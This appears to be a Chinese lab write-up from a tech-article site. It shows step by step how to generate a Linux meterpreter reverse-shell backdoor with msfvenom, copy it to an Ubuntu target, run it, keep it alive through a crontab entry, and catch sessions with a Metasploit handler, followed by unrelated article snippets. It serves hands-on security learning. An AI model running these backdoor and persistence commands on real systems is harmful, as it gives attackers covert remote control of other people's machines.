网络安全: Kali Linux 进行 MSFvenom 程序利用

目录

 一、实验

1.环境

2. Kali Linux 进行 MSFvenom 程序利用

3. 创建计划任务自动运行 MSFvenom 程序

二、问题

1.在线加密解密

2.MSF 运行失败

3.MobaXterm 连接Ubuntu 失败


 一、实验

1.环境

(1)主机

表1  主机

系统版本IP备注
Kali Linux2022.4

192.168.204.154(动态)

Ubuntu8.04192.168.204.143Kali(2022.4)的目标主机

(2)查看Kali Linux (2022.4)系统版本

cat /etc/os-release

(6) 查看Kali Linux (2022.4)系统IP地址

ip addr | grep 154

(7)查看Ubuntu 8.04 系统版本及IP地址

lsb_release -a

ip addr

2. Kali Linux 进行 MSFvenom 程序利用

(1)创建后⻔程序

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.204.154 lport=4444 -f elf -o shell

(2) 配置ssh文件

vim .ssh/config

Host *
HostkeyAlgorithms +ssh-rsa
PubkeyAcceptedKeyTypes +ssh-rsa

(3)植⼊后⻔程序

scp shell root@192.168.204.143:/mnt

(4)Ubuntu查看权限

ls -l /mnt

(4)Ubuntu激活后⻔程序

chmod  a+x  /mnt/shell

(5)再次查看权限

ls -l /mnt

(6)Ubuntu后台执行

/mnt/shell & 

(7)Kali Linux 连接后门

新开一个终端

msfconsole

(8)调用侦听模块

 use  exploit/multi/handler 

(9)设置响应的IP地址

 set lhost 192.168.204.154

(10)设置响应的端口

set lport  4444

(11)设置载荷

set payload linux/x86/meterpreter/reverse_tcp

(12)运行

开启TCP反向侦听

run

(13)Ubuntu再次后台运行

(14)已连接

(15)查看用户权限及进程

用户

getuid

进程号

getpid

(16) 进入内核

shell

查看用户

whoami

查看路径

pwd

(17)退出

exit

3. 创建计划任务自动运行 MSFvenom 程序

(1)Ubuntu创建计划任务crontab程序

EDITOR=vim crontab -e

修改前:

修改后:

# m h  dom mon dow   command
* * * * * /bin/date>>/tmp/time.txt
* * * * * /mnt/shell &

(2)Kali Linux 连接后门

新开一个终端

msfconsole

 (3)调用侦听模块

 use  exploit/multi/handler 

(4)设置响应的IP地址

 set lhost 192.168.204.154

(5)设置响应的端口

set lport  4444

(6)设置载荷

set payload linux/x86/meterpreter/reverse_tcp

(7)运行

开启TCP反向侦听(已自动连接)

run

(8)运行在后台

background

(9) 查看会话

sessions

(10)切换会话

sessions 1

(11) 退出

exit

二、问题

1.在线加密解密

(1)查看DES 对称加密

http://www.jsons.cn/desencrypt

2.MSF 运行失败

(1) 报错

(2)原因分析

lhost地址错。

(3)解决方法

修改lhost地址。

已连接:

3.MobaXterm 连接Ubuntu 失败

(1) 报错

(2)原因分析

Ubuntu未设置root密码

(3)解决方法

sudo -ipasswd root

成功:

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/517566.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

centos7保姆级安装jdk8教程

文章目录 1、下载jdk安装包2、在centos7 创建文件夹3、解压jdk文件4、配置环境变量a、打开环境变量文件b、将配置信息复制进去。c、重新加载环境变量 5、测试是否成功 1、下载jdk安装包 jdk下载地址:https://www.oracle.com/java/technologies/downloads/ Oracle…

基于springboot的精准扶贫管理系统论文

精准扶贫管理系统 摘要 随着信息技术在管理上越来越深入而广泛的应用,管理信息系统的实施在技术上已逐步成熟。本文介绍了精准扶贫管理系统的开发全过程。通过分析精准扶贫管理系统管理的不足,创建了一个计算机管理精准扶贫管理系统的方案。文章介绍了精…

AIGC工具( 7个 )

人工智能技术有好的一方面,又不好的地方,要区别对待,吸取精华,去其糟粕。目前市场上有很多AI大模型,可以支持聊天,写文稿,创作等,部分可以生成图片,以下是7个很不错的免费…

[数据结构初阶】栈

各位读者老爷好,鼠鼠我好久没写博客了(太摆烂了),今天就基于C语言浅介绍一下数据结构里面的栈,希望对你有所帮助吧。 目录 1.栈的概念及结构 2.栈的实现 2.1定义栈 2.2.初始化栈 2.3.入栈 2.4.出栈 2.5.获取栈…

RabbitMQ队列

RabbitMQ队列 1、死信的概念 ​ 先从概念解释上搞清楚这个定义,死信,顾名思义就是无法被消费的消息,字面意思可以这样理解,一般来说,producer将消息投递到broker或者直接到queue里了,consumer 从 queue取出消息进行消…

微服务基础

目录 一、单体架构 二、分布式架构 三、微服务 四、微服务结构 五、SpringCloud 六、服务拆分 七、远程调用 一、单体架构 单体架构就是将业务的所有功能都集中在一个项目中进行开发,并打成一个包进行部署。 他的优点很明显,就是架构简单&#xff…

JVM-类加载机制

名词解释 *.class文件的结构 查看指令: javap -verbose hello.class 包含信息: 结构信息(版本号,大小信息); 元数据(类,继承,接口,字段声明,方法声…

应用监控 eBPF 版:实现 Golang 微服务的无侵入应用监控

作者:古琦 在现代软件架构中,微服务已成为构建可扩展和灵活应用程序的流行方式。每个微服务负责应用程序的一部分功能,它们共同工作以提供完整的服务。由于微服务架构的分散特性,监控变得至关重要,有效的微服务监控是…

视频推拉流EasyDSS平台直播通道重连无法转推的原因排查与解决

视频推拉流EasyDSS视频直播点播平台,集视频直播、点播、转码、管理、录像、检索、时移回看等功能于一体,可提供音视频采集、视频推拉流、播放H.265编码视频、存储、分发等视频能力服务。 用户使用EasyDSS平台对直播通道进行转推,发现只要关闭…

Object.keys()的用法

1、语法 Object.keys(obj) 参数:要返回其枚举自身属性的对象 返回值:一个表示给定对象的所有可枚举属性的字符串数组 2、处理对象,返回可枚举的属性数组 let person {name:“张三”,age:25,address:“深圳”,getName:function(){}} Obj…

Wireshark——获取指定协议的数据包

1、问题 使用Wireshark捕获了大量的数据包,但是只想要指定协议的数据包。 2、方法 例如,只想要Modbus/TCP协议的数据包。 在应用显示过滤器中输入协议的名称(小写),回车。 选择文件,导出特定分组。 将所…

基于redis实现用户登陆

因为session有数据共享问题,不同tomcat服务器中的session不能共享,之后负载均衡就无法实现。所以我们用redis代替session。redis可以被多个tomcat服务器共享,redis基于内存。 之前的session可以看做登陆凭证,本次登陆凭证由sessi…